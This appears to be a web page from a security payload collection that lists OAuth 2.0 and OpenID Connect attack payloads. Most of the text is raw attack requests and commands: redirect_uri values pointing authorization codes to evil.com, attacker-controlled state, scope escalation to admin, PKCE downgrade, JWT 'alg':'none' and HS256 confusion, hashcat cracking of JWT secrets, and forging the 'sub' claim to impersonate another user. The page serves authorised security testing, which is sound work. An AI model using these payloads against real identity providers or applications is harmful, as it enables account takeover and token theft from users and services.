$loading...
OAuth 2.0 and OpenID Connect attack techniques including CSRF via missing state, open redirect in redirect_uri, token scope escalation, and PKCE bypass. (19 payloads)
GET /oauth/authorize?client_id=app&redirect_uri=https://app.com/callback&response_type=codeGET /oauth/authorize?client_id=app&redirect_uri=https://app.com/callback&response_type=code&state=ATTACKER_CONTROLLED_VALUEGET /oauth/authorize?client_id=app&redirect_uri=https://evil.com&response_type=codeGET /oauth/authorize?client_id=app&redirect_uri=https://app.com.evil.com&response_type=codeGET /oauth/authorize?client_id=app&redirect_uri=https://app.com/callback/../../../redirect?url=https://evil.com&response_type=codeGET /oauth/authorize?client_id=app&redirect_uri=https://app.com/callback%0a%0dhttps://evil.com&response_type=codeCheck Referer header on callback page — code may leak in Referer to third-party scriptsLook for auth code in server-side logs, analytics, or CDN access logsGET /oauth/authorize?client_id=app&redirect_uri=https://app.com/callback&response_type=tokenPOST /oauth/token
scope=admin openid profileGET /oauth/authorize?client_id=app&scope=admin+openid+profile&response_type=codeRemove code_verifier from token exchange POST body and test if server still returns tokenPOST /oauth/token with code_challenge_method=plain instead of S256{"alg":"none"}hashcat -m 16500 jwt_token.txt rockyou.txt{"alg":"HS256"}Decode ID token and check if "aud" claim is validated — swap aud to another client_idReplay ID token with old nonce value — check if server rejects replaysDecode ID token, swap "sub" claim to another user ID, re-sign and submitLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides